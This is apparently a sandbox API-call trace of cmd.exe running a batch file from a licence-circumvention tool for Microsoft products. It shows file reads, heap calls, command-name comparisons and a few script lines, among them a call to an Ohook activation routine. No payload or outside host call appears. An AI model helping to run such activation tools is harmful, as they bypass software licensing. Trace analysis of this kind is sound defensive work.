\"/Ohook\" %nul% && (setlocal & cls & (call :OhookActivation %_args% %_silent%) & endlocal)\r\n====================\r\n") returned 2 [0179.699] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.699] GetFileType (hFile=0xa0) returned 0x1 [0179.699] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.699] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x20d2 [0179.699] GetProcessHeap () returned 0x19a8f1e0000 [0179.699] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f207830 [0179.700] GetProcessHeap () returned 0x19a8f1e0000 [0179.700] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f207830) returned 1 [0179.700] _tell (_FileHandle=3) returned 8402 [0179.700] _close (_FileHandle=3) returned 0 [0179.701] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0179.701] _open_osfhandle (_OSFileHandle=0xa0, _Flags=8) returned 3 [0179.701] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.701] SetFilePointer (in: hFile=0xa0, lDistanceToMove=8402, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x20d2 [0179.701] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.701] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x20d2 [0179.701] ReadFile (in: hFile=0xa0, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0179.701] SetFilePointer (in: hFile=0xa0, lDistanceToMove=8542, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x215e [0179.701] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="::========================================================================================================================================\r\n", cbMultiByte=140, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="::========================================================================================================================================\r\n") returned 140 [0179.701] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.701] GetFileType (hFile=0xa0) returned 0x1 [0179.701] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.701] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x215e [0179.701] GetProcessHeap () returned 0x19a8f1e0000 [0179.701] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f207830 [0179.701] GetProcessHeap () returned 0x19a8f1e0000 [0179.702] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f207830) returned 1 [0179.702] _tell (_FileHandle=3) returned 8542 [0179.702] _close (_FileHandle=3) returned 0 [0179.702] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0179.702] _open_osfhandle (_OSFileHandle=0xa0, _Flags=8) returned 3 [0179.702] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.702] SetFilePointer (in: hFile=0xa0, lDistanceToMove=8542, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x215e [0179.703] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.703] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x215e [0179.703] ReadFile (in: hFile=0xa0, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0179.703] SetFilePointer (in: hFile=0xa0, lDistanceToMove=8544, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2160 [0179.703] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="\r\n========================================================================================================================================\r\n") returned 2 [0179.703] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.703] GetFileType (hFile=0xa0) returned 0x1 [0179.703] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.703] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2160 [0179.703] GetProcessHeap () returned 0x19a8f1e0000 [0179.703] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f207830 [0179.703] GetProcessHeap () returned 0x19a8f1e0000 [0179.704] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f207830) returned 1 [0179.704] _tell (_FileHandle=3) returned 8544 [0179.704] _close (_FileHandle=3) returned 0 [0179.704] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0179.704] _open_osfhandle (_OSFileHandle=0xa0, _Flags=8) returned 3 [0179.704] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.704] SetFilePointer (in: hFile=0xa0, lDistanceToMove=8544, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2160 [0179.704] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.704] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2160 [0179.704] ReadFile (in: hFile=0xa0, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0179.704] SetFilePointer (in: hFile=0xa0, lDistanceToMove=8578, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2182 [0179.704] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="setlocal DisableDelayedExpansion\r\n", cbMultiByte=34, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="setlocal DisableDelayedExpansion\r\n========================================================================================================\r\n") returned 34 [0179.704] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.705] GetFileType (hFile=0xa0) returned 0x1 [0179.705] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.705] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2182 [0179.705] GetProcessHeap () returned 0x19a8f1e0000 [0179.705] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f207830 [0179.705] GetProcessHeap () returned 0x19a8f1e0000 [0179.705] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f207830) returned 1 [0179.705] _wcsicmp (_String1="setlocal", _String2=")") returned 74 [0179.705] _wcsicmp (_String1="FOR", _String2="setlocal") returned -13 [0179.705] _wcsicmp (_String1="FOR/?", _String2="setlocal") returned -13 [0179.706] _wcsicmp (_String1="IF", _String2="setlocal") returned -10 [0179.706] _wcsicmp (_String1="IF/?", _String2="setlocal") returned -10 [0179.706] _wcsicmp (_String1="REM", _String2="setlocal") returned -1 [0179.706] _wcsicmp (_String1="REM/?", _String2="setlocal") returned -1 [0179.706] GetProcessHeap () returned 0x19a8f1e0000 [0179.706] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1ee550 [0179.706] GetProcessHeap () returned 0x19a8f1e0000 [0179.706] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x22) returned 0x19a8f1eb9e0 [0179.706] GetProcessHeap () returned 0x19a8f1e0000 [0179.706] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x42) returned 0x19a8f1f9130 [0179.706] _tell (_FileHandle=3) returned 8578 [0179.706] _close (_FileHandle=3) returned 0 [0179.707] _wcsicmp (_String1="setlocal", _String2="DIR") returned 15 [0179.707] _wcsicmp (_String1="setlocal", _String2="ERASE") returned 14 [0179.707] _wcsicmp (_String1="setlocal", _String2="DEL") returned 15 [0179.707] _wcsicmp (_String1="setlocal", _String2="TYPE") returned -1 [0179.707] _wcsicmp (_String1="setlocal", _String2="COPY") returned 16 [0179.707] _wcsicmp (_String1="setlocal", _String2="CD") returned 16 [0179.707] _wcsicmp (_String1="setlocal", _String2="CHDIR") returned 16 [0179.707] _wcsicmp (_String1="setlocal", _String2="RENAME") returned 1 [0179.707] _wcsicmp (_String1="setlocal", _String2="REN") returned 1 [0179.707] _wcsicmp (_String1="setlocal", _String2="ECHO") returned 14 [0179.707] _wcsicmp (_String1="setlocal", _String2="SET") returned 108 [0179.707] _wcsicmp (_String1="setlocal", _String2="PAUSE") returned 3 [0179.707] _wcsicmp (_String1="setlocal", _String2="DATE") returned 15 [0179.707] _wcsicmp (_String1="setlocal", _String2="TIME") returned -1 [0179.707] _wcsicmp (_String1="setlocal", _String2="PROMPT") returned 3 [0179.707] _wcsicmp (_String1="setlocal", _String2="MD") returned 6 [0179.707] _wcsicmp (_String1="setlocal", _String2="MKDIR") returned 6 [0179.707] _wcsicmp (_String1="setlocal", _String2="RD") returned 1 [0179.707] _wcsicmp (_String1="setlocal", _String2="RMDIR") returned 1 [0179.707] _wcsicmp (_String1="setlocal", _String2="PATH") returned 3 [0179.707] _wcsicmp (_String1="setlocal", _String2="GOTO") returned 12 [0179.707] _wcsicmp (_String1="setlocal", _String2="SHIFT") returned -3 [0179.707] _wcsicmp (_String1="setlocal", _String2="CLS") returned 16 [0179.707] _wcsicmp (_String1="setlocal", _String2="CALL") returned 16 [0179.707] _wcsicmp (_String1="setlocal", _String2="VERIFY") returned -3 [0179.707] _wcsicmp (_String1="setlocal", _String2="VER") returned -3 [0179.707] _wcsicmp (_String1="setlocal", _String2="VOL") returned -3 [0179.707] _wcsicmp (_String1="setlocal", _String2="EXIT") returned 14 [0179.708] _wcsicmp (_String1="setlocal", _String2="SETLOCAL") returned 0 [0179.708] GetConsoleTitleW (in: lpConsoleTitle=0x43f9efec50, nSize=0x104 | out: lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 0x31 [0179.708] _wcsicmp (_String1="setlocal", _String2="DIR") returned 15 [0179.708] _wcsicmp (_String1="setlocal", _String2="ERASE") returned 14 [0179.708] _wcsicmp (_String1="setlocal", _String2="DEL") returned 15 [0179.708] _wcsicmp (_String1="setlocal", _String2="TYPE") returned -1 [0179.708] _wcsicmp (_String1="setlocal", _String2="COPY") returned 16 [0179.708] _wcsicmp (_String1="setlocal", _String2="CD") returned 16 [0179.708] _wcsicmp (_String1="setlocal", _String2="CHDIR") returned 16 [0179.708] _wcsicmp (_String1="setlocal", _String2="RENAME") returned 1 [0179.708] _wcsicmp (_String1="setlocal", _String2="REN") returned 1 [0179.708] _wcsicmp (_String1="setlocal", _String2="ECHO") returned 14 [0179.708] _wcsicmp (_String1="setlocal", _String2="SET") returned 108 [0179.708] _wcsicmp (_String1="setlocal", _String2="PAUSE") returned 3 [0179.708] _wcsicmp (_String1="setlocal", _String2="DATE") returned 15 [0179.708] _wcsicmp (_String1="setlocal", _String2="TIME") returned -1 [0179.708] _wcsicmp (_String1="setlocal", _String2="PROMPT") returned 3 [0179.709] _wcsicmp (_String1="setlocal", _String2="MD") returned 6 [0179.709] _wcsicmp (_String1="setlocal", _String2="MKDIR") returned 6 [0179.709] _wcsicmp (_String1="setlocal", _String2="RD") returned 1 [0179.709] _wcsicmp (_String1="setlocal", _String2="RMDIR") returned 1 [0179.709] _wcsicmp (_String1="setlocal", _String2="PATH") returned 3 [0179.709] _wcsicmp (_String1="setlocal", _String2="GOTO") returned 12 [0179.709] _wcsicmp (_String1="setlocal", _String2="SHIFT") returned -3 [0179.709] _wcsicmp (_String1="setlocal", _String2="CLS") returned 16 [0179.709] _wcsicmp (_String1="setlocal", _String2="CALL") returned 16 [0179.709] _wcsicmp (_String1="setlocal", _String2="VERIFY") returned -3 [0179.709] _wcsicmp (_String1="setlocal", _String2="VER") returned -3 [0179.709] _wcsicmp (_String1="setlocal", _String2="VOL") returned -3 [0179.709] _wcsicmp (_String1="setlocal", _String2="EXIT") returned 14 [0179.709] _wcsicmp (_String1="setlocal", _String2="SETLOCAL") returned 0 [0179.709] GetProcessHeap () returned 0x19a8f1e0000 [0179.709] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x74) returned 0x19a8f1ef3a0 [0179.709] GetProcessHeap () returned 0x19a8f1e0000 [0179.709] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1ef3a0, Size=0x42) returned 0x19a8f1f94f0 [0179.709] GetProcessHeap () returned 0x19a8f1e0000 [0179.709] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1f94f0) returned 0x42 [0179.709] GetProcessHeap () returned 0x19a8f1e0000 [0179.709] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x54) returned 0x19a8f1f89a0 [0179.709] GetProcessHeap () returned 0x19a8f1e0000 [0179.709] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ecd00 [0179.709] GetProcessHeap () returned 0x19a8f1e0000 [0179.709] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x28) returned 0x19a8f1eb6b0 [0179.709] GetProcessHeap () returned 0x19a8f1e0000 [0179.709] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x8) returned 0x19a8f1e6160 [0179.709] GetEnvironmentStringsW () returned 0x19a8f2029e0* [0179.710] GetProcessHeap () returned 0x19a8f1e0000 [0179.710] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xfbe) returned 0x19a8f207830 [0179.710] memcpy (in: _Dst=0x19a8f207830, _Src=0x19a8f2029e0, _Size=0xfbe | out: _Dst=0x19a8f207830) returned 0x19a8f207830 [0179.710] FreeEnvironmentStringsA (penv="=") returned 1 [0179.710] GetProcessHeap () returned 0x19a8f1e0000 [0179.710] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x74) returned 0x19a8f1ef220 [0179.710] GetProcessHeap () returned 0x19a8f1e0000 [0179.710] RtlReAllocateHeap (Heap=0x19a8f1e0000, Flags=0x0, Ptr=0x19a8f1ef220, Size=0x42) returned 0x19a8f1f8ff0 [0179.710] GetProcessHeap () returned 0x19a8f1e0000 [0179.710] RtlSizeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, MemoryPointer=0x19a8f1f8ff0) returned 0x42 [0179.710] _wcsicmp (_String1="DisableDelayedExpansion", _String2="ENABLEEXTENSIONS") returned -1 [0179.710] _wcsicmp (_String1="DisableDelayedExpansion", _String2="DISABLEEXTENSIONS") returned -1 [0179.710] _wcsicmp (_String1="DisableDelayedExpansion", _String2="ENABLEDELAYEDEXPANSION") returned -1 [0179.710] _wcsicmp (_String1="DisableDelayedExpansion", _String2="DISABLEDELAYEDEXPANSION") returned 0 [0179.710] _get_osfhandle (_FileHandle=1) returned 0x24 [0179.710] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x7) returned 1 [0179.711] _get_osfhandle (_FileHandle=1) returned 0x24 [0179.711] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff7bd72960c | out: lpMode=0x7ff7bd72960c) returned 1 [0179.711] _get_osfhandle (_FileHandle=0) returned 0x20 [0179.711] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7bd729608 | out: lpMode=0x7ff7bd729608) returned 1 [0179.711] SetConsoleInputExeNameW () returned 0x1 [0179.711] GetConsoleOutputCP () returned 0x1b5 [0179.712] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0179.712] SetThreadUILanguage (LangId=0x0) returned 0x409 [0179.712] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0179.712] _open_osfhandle (_OSFileHandle=0xa0, _Flags=8) returned 3 [0179.713] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.713] SetFilePointer (in: hFile=0xa0, lDistanceToMove=8578, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2182 [0179.713] GetProcessHeap () returned 0x19a8f1e0000 [0179.713] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f1f8ff0) returned 1 [0179.713] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.713] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2182 [0179.713] ReadFile (in: hFile=0xa0, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0179.713] SetFilePointer (in: hFile=0xa0, lDistanceToMove=8580, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2184 [0179.713] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="\r\ntlocal DisableDelayedExpansion\r\n========================================================================================================\r\n") returned 2 [0179.713] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.714] GetFileType (hFile=0xa0) returned 0x1 [0179.714] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.714] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2184 [0179.714] GetProcessHeap () returned 0x19a8f1e0000 [0179.714] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f20d9b0 [0179.714] GetProcessHeap () returned 0x19a8f1e0000 [0179.715] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20d9b0) returned 1 [0179.715] _tell (_FileHandle=3) returned 8580 [0179.715] _close (_FileHandle=3) returned 0 [0179.715] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0179.715] _open_osfhandle (_OSFileHandle=0xa0, _Flags=8) returned 3 [0179.715] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.715] SetFilePointer (in: hFile=0xa0, lDistanceToMove=8580, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2184 [0179.715] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.715] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2184 [0179.716] ReadFile (in: hFile=0xa0, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0179.716] SetFilePointer (in: hFile=0xa0, lDistanceToMove=8608, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x21a0 [0179.716] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=":: Check desktop location\r\n", cbMultiByte=28, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr=":: Check desktop location\r\nsion\r\n========================================================================================================\r\n") returned 28 [0179.716] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.716] GetFileType (hFile=0xa0) returned 0x1 [0179.716] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.716] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x21a0 [0179.716] GetProcessHeap () returned 0x19a8f1e0000 [0179.716] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f20d9b0 [0179.716] GetProcessHeap () returned 0x19a8f1e0000 [0179.716] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20d9b0) returned 1 [0179.716] _tell (_FileHandle=3) returned 8608 [0179.717] _close (_FileHandle=3) returned 0 [0179.717] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0179.717] _open_osfhandle (_OSFileHandle=0xa0, _Flags=8) returned 3 [0179.717] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.717] SetFilePointer (in: hFile=0xa0, lDistanceToMove=8608, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x21a0 [0179.717] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.717] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x21a0 [0179.717] ReadFile (in: hFile=0xa0, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0179.717] SetFilePointer (in: hFile=0xa0, lDistanceToMove=8610, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x21a2 [0179.717] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="\r\n Check desktop location\r\nsion\r\n========================================================================================================\r\n") returned 2 [0179.717] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.717] GetFileType (hFile=0xa0) returned 0x1 [0179.717] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.717] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x21a2 [0179.717] GetProcessHeap () returned 0x19a8f1e0000 [0179.717] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f20d9b0 [0179.717] GetProcessHeap () returned 0x19a8f1e0000 [0179.718] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20d9b0) returned 1 [0179.718] _tell (_FileHandle=3) returned 8610 [0179.718] _close (_FileHandle=3) returned 0 [0179.718] CreateFileW (lpFileName="C:\\Windows\\Temp\\MAS_15344413.cmd" (normalized: "c:\\windows\\temp\\mas_15344413.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x43f9efeea0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0179.719] _open_osfhandle (_OSFileHandle=0xa0, _Flags=8) returned 3 [0179.719] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.719] SetFilePointer (in: hFile=0xa0, lDistanceToMove=8610, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x21a2 [0179.719] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.719] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x21a2 [0179.719] ReadFile (in: hFile=0xa0, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x43f9efee60, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efee60*=0x1fff, lpOverlapped=0x0) returned 1 [0179.719] SetFilePointer (in: hFile=0xa0, lDistanceToMove=8626, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x21b2 [0179.719] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="set _desktop_=\r\n", cbMultiByte=16, lpWideCharStr=0x7ff7bd7209e0, cchWideChar=8191 | out: lpWideCharStr="set _desktop_=\r\np location\r\nsion\r\n========================================================================================================\r\n") returned 16 [0179.719] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.719] GetFileType (hFile=0xa0) returned 0x1 [0179.719] _get_osfhandle (_FileHandle=3) returned 0xa0 [0179.719] SetFilePointer (in: hFile=0xa0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x21b2 [0179.719] GetProcessHeap () returned 0x19a8f1e0000 [0179.719] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x4012) returned 0x19a8f20d9b0 [0179.719] GetProcessHeap () returned 0x19a8f1e0000 [0179.720] RtlFreeHeap (HeapHandle=0x19a8f1e0000, Flags=0x0, BaseAddress=0x19a8f20d9b0) returned 1 [0179.720] _wcsicmp (_String1="set", _String2=")") returned 74 [0179.720] _wcsicmp (_String1="FOR", _String2="set") returned -13 [0179.720] _wcsicmp (_String1="FOR/?", _String2="set") returned -13 [0179.720] _wcsicmp (_String1="IF", _String2="set") returned -10 [0179.720] _wcsicmp (_String1="IF/?", _String2="set") returned -10 [0179.720] _wcsicmp (_String1="REM", _String2="set") returned -1 [0179.720] _wcsicmp (_String1="REM/?", _String2="set") returned -1 [0179.720] GetProcessHeap () returned 0x19a8f1e0000 [0179.720] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0xb0) returned 0x19a8f1edf50 [0179.720] GetProcessHeap () returned 0x19a8f1e0000 [0179.720] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x18) returned 0x19a8f1ec780 [0179.720] GetProcessHeap () returned 0x19a8f1e0000 [0179.721] RtlAllocateHeap (HeapHandle=0x19a8f1e0000, Flags=0x8, Size=0x28) returned 0x19a8f1eb710 [0179.721] _tell (_FileHandle=3) returned 8626 [0179.721] _close (_FileHandle=3) returned 0 [0179.721] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0179.721] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0179.721] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0179.721] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0179.721] _wcsicmp 